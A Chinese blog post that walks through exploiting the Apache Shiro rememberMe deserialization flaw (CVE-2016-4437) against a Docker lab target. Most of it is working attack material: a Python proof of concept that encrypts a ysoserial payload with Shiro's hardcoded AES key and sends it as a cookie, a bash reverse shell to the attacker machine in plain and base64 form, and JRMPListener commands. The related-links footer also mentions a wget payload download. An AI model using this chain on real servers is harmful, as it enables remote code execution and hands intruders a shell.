Apache Shiro Java反序列化漏洞(CVE-2016-4437)

最新推荐文章于 2024-05-15 15:49:34 发布
最新推荐文章于 2024-05-15 15:49:34 发布
阅读量693 收藏 2
点赞数
分类专栏: 笔记 文章标签: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45300786/article/details/111710048
版权

我只是个无情的挂马机器,原理相信百度一大把,我就不赘述了

0x00 环境要求

靶机:192.168.100.23
攻击机:192.168.100.34

0x01 环境搭建

这里使用docker进行环境搭建:

下载
git clone https://github.com/Medicean/VulApps/tree/master/s/shiro/1
1.拉取环境到本地
$ docker pull medicean/vulapps:s_shiro_1
2.启动环境
$ docker run -d -p 8080:8080 medicean/vulapps:s_shiro_1

在这里插入图片描述

搭建成功

在这里插入图片描述

0x02 需要文件

1、ysoserial反序列化利用工具生成ysoserial-0.0.6-SNAPSHOT-all.jar
2、反弹shell的命令进行编码网站

http://www.jackson-t.ca/runtime-exec-payloads.html

3、利用poc

制作文件

1、ysoserial是一款目前最流行的Java反序列化Payload生成工具,目前支持29种的Payload生成。

git clone https://github.com/frohoff/ysoserial.git
cd ysoserial
mvn package -D skipTests

mvn(maven)环境搭建教程:
https://www.runoob.com/maven/maven-setup.html
即可生成ysoserial-0.0.6-SNAPSHOT-all.jar文件
在这里插入图片描述
2、
制作反弹shell的命令,使用http://www.jackson-t.ca/runtime-exec-payloads.html进行编码

bash -i >& /dev/tcp/192.168.100.34/8888 0>&1

在这里插入图片描述
3、大佬poc:poc.py:

#coding: utf-8

import os
import re
import base64
import uuid
import subprocess
import requests
import sys
from Crypto.Cipher import AES

JAR_FILE = './ysoserial-0.0.6-SNAPSHOT-all.jar'


def poc(url, rce_command):
    if '://' not in url:
        target = 'https://%s' % url if ':443' in url else 'http://%s' % url
    else:
        target = url
    try:
        payload = generator(rce_command, JAR_FILE)  # 生成payload
        r = requests.get(target, cookies={'rememberMe': payload.decode()}, timeout=10)  # 发送验证请求
        print r.text
    except Exception, e:
        pass
    return False


def generator(command, fp):
    if not os.path.exists(fp):
        raise Exception('jar file not found!')
    popen = subprocess.Popen(['java', '-jar', fp, 'JRMPClient', command],
                             stdout=subprocess.PIPE)
    BS = AES.block_size
    pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
    key = "kPH+bIxk5D2deZiIxcaaaA=="
    mode = AES.MODE_CBC
    iv = uuid.uuid4().bytes
    encryptor = AES.new(base64.b64decode(key), mode, iv)
    file_body = pad(popen.stdout.read())
    base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
    return base64_ciphertext

if __name__ == '__main__':
    poc("http://192.168.100.23:8080","192.168.100.34:1096")

使用ysoserial中的JRMP监听模块,监听1096 端口

这里介绍一下上面poc里面的JRMPClient与下面使用监听命令的JRMPListenter

payloads/JRMPClient 是结合 exploit/JRMPListener 使用的
JRMPListener是ysoserial 工具里的其中一个利用模块,作用是通过反序列化,开启当前主机的一个 JRMP Server ,具体的利用过程是,将反序列化数据 发送到 Server 中,然后Server中进行反序列化操作,并开启指定端口,然后在通过JRMPClient去发送攻击 payload
payloads/JRMPClient 生存的 payload 是发送给目标机器的,exploit/JRMPListener 是在自己服务器上使用的
超详细分析:https://xz.aliyun.com/t/2650

(执行此命令的时候,ysoserial-0.0.6-SNAPSHOT-all.jar要在当前目录哦)
在攻击机上执行监听命令

java -cp ysoserial-0.0.6-SNAPSHOT-all.jar  ysoserial.exploit.JRMPListener 1096 CommonsCollections4 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwMC4zNC84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}'

在这里插入图片描述
在要反弹到的机器(攻击机)上执行监听8888端口,静候shell
在这里插入图片描述
执行poc:
在这里插入图片描述
shell反弹成功
在这里插入图片描述
至此利用成功。

这里提供工具下载包括

poc文件
ysoserial-0.0.6-SNAPSHOT-all.jar文件
密钥硬编码文件shiro-core-1.2.4.jar
参考文章
https://www.cnblogs.com/bmjoker/p/11650295.html

樱浅沐冰
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ysoserial的代码学习
问题很多的小明
08-29 631
序列漏洞利用神器:ysoserial 0x01ysoserial 工具模块 我们以为shiro远程加载序列数据的利用场景为例: java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 12345 CommonsCollections5 'wget http://xxx.xxx.xxx.xxx:8080/1.sh -O test' 其中-cp指定了类路径为: ysoserial.exploit.
ysoserial-0.0.6-SNAPSHOT-all.jar
05-23
编译好的ysoserial.可序列问题。
shiro_attack工具-shiro序列漏洞的快速检测和利用
最新发布
weixin_59047731的博客
05-15 658
今天分享一个好用的渗透测试工具,主要是针对shiro框架漏洞的,它可以自动的爆破shiro密钥,同时可以写入大马,本人实战中觉得很好用!!!工具名称。
Java序列漏洞(ysoserial工具使用、shiro序列利用)
qq_50854662的博客
05-26 1816
Java序列漏洞(ysoserial工具使用、shiro序列利用)
Apache Shiro Java序列漏洞分析
2301_77512689的博客
04-25 424
最终利用ysoserial的CommonsBeanutils1命令执行。虽然在ysoserial里CommonsBeanutils1类的版本为1.9.2,不过上面环境测试确实可以命令执行。这里当时有一个问题是:如何获取Java里引用组件的版本?大多数的时候,我们只要解析pom.xml就能解析出相应组件的版本。但有的情况下,并不能获取组件的版本。比如有的pom.xml并没有设置组件的version版本,没有设置version的情况,是由依赖决定。项目中依赖了A,A依赖了B,B的版本由A决定;
每天一个漏洞之——shiro序列
qq_54030686的博客
01-23 2241
每天一个漏洞之——shiro序列 原因:Apache Shiro框架提供了记住密码的功能(RememberMe),用户登录成功后会生成经过加密并编码的cookie。在服务端对rememberMe的cookie值,先base64解码然后AES解密再序列,就导致了序列RCE漏洞。这个AES解密类似于md5加密过程中使用的盐,简单的理解为这个shiro框架泄露了相应的AES密钥 出现的标志:返回数据包中出现rememberMe=deleteme字样,说明此系统使用的为shiro框架,即可使用对应的工具
CVE-2016-4437 Shiro550 & Shiro721 RememberMe Padding Oracle 漏洞利用
03-29
CVE-2016-4437 Shiro550 & Shiro721 RememberMe Padding Oracle Shiro721 RememberMe Padding Oracle影响版本: - Apache Shiro 1.2.5,1.2.6,1.3.0,1.3.1,1.3.2,1.4.0-RC2,1.4.0,1.4.1 CVE-2016-4437 ...
Apache shiro1.2.4序列漏洞介绍.docx
07-01
然而,在Apache Shiro 1.2.4及其更早的版本中,存在一个严重的序列漏洞。这个漏洞主要与RememberMe服务的实现有关。在处理RememberMe的Cookie时,Shiro的`CookieRememberMeManager`类会执行一系列操作:首先,它...
shiro 序列漏洞综合利用工具 shiro_attack_by J1anfen
11-05
在提到的 "shiro_attack_by J1anfen" 工具中,重点是针对 Apache Shiro 的一个特定安全问题:序列漏洞序列漏洞通常出现在程序中,当接收到从网络或持久存储中读取的数据,并将其转换回原来的对象实例时...
Shiro序列漏洞检测工具
01-05
1. **升级Shiro版本**:确保Shiro框架的版本高于1.2.4,因为从1.2.5开始,Apache Shiro已经修复了这个序列漏洞。 2. **禁用不必要的序列**:避免在不受信任的输入上进行序列,尤其是在处理网络数据时。 3....
Shiro_exploit:Apache Shiro Java序列漏洞的分析和利用
03-10
Apache Shiro Java序列进攻分析及利用0x00项目地址0x01概述两者天被派去去护网&重保,态势感知报告了一条冰蝎的远程代码执行的纠正,在通过日志以及webshel​​l及相关信息,红队大概是通过shiro序列拿到...
CVE-2016-8655 Linux内核提权漏洞POC
11-18
CVE-2016-8655 Linux内核提权漏洞POC
最新版ysoserial-0.0.6-SNAPSHOT-BETA-all.jar
07-23
github已经不怎么好下载的,作者已经把文件上传到其他的平台,刚刚使用的时候遇到了一点问题,要将原文件名改正确了之后才能用。
shiro CVE-2016-4437 漏洞复现
qq_40646572的博客
05-09 858
shiro550漏洞漏洞点就在于用户信息序列可利用,并且加密的key值给了一个固定的默认值的,导致很多开发人员直接使用,接着导致了洞的产生。
CVE-2016-4437 Shiro序列漏洞复现
weixin_45260839的博客
05-15 2777
CVE-2016-4437 Shiro序列漏洞复现
CVE-2016-4437 Apache Shiro 序列漏洞复现
yzl_007的博客
07-26 425
Apache Shiro 序列漏洞复现(CVE-2016-4437) 漏洞描述 Apache Shiro是一个Java安全框架,执行身份验证、授权、密码和会话管理。只要rememberMe的AES加密密钥泄露,无论shiro是什么版本都会导致序列漏洞。 使用burp抓包查看 漏洞原理 Apache Shiro框架提供了记住我(RememberMe)的功能,关闭了浏览器下次再打开时还是能记住你是谁,下次访问时无需再登录即可访问。 Shiro对rememberMe的cookie做了加密处理,shiro
Apache Shiro 1.2.4 序列漏洞(CVE-2016-4437 )
good good study
03-28 9583
Shiro 1.2.4 序列漏洞
Apache Shiro 默认密钥致命令执行漏洞CVE-2016-4437)
12-21 3473
目录 1 漏洞描述 2 漏洞特征 3 修复建议 4 解决办法 4.1 升级shiro到最新版本 4.2 自定义生成AESkey(Apache Shiro使用官方自带的生成AES密钥) 5 参考网址 1 漏洞描述 Apache Shiro 是ASF旗下的一款开源软件,它提供了一个强大而灵活的安全框架,提供身份验证、授权、密码学和会话管理。在Apache Shiro部分旧版本中,加密的用户信息序列后存储在名为remember-me的Cookie中,攻击者可以使用Shiro的默认密钥...
Apache Shiro序列CVE-2016-4437)漏洞复现
m0_55854679的博客
07-31 739
Apache shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。使用Java序列—>使用密钥进行AES加密—>Base64加密—>得到加密后的RememberMe内容同时在识别用户身份的时候,需要对RememberMe加密内容—>Base64解密—>使用密钥进行AES解密—>Java序列问题出在AES加密的密钥Key被硬编码在代码里,这意味着攻击者只要通过源代码找到AES加密的密钥,就可以构造一个恶意对象,对其进行序列,的将。..
Apache Shiro 1.2.4序列漏洞CVE-2016-4437)
weixin_60719780的博客
02-11 1171
Apache Shiro是一个Java安全框架,执行身份验证、授权、密码和会话管理。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值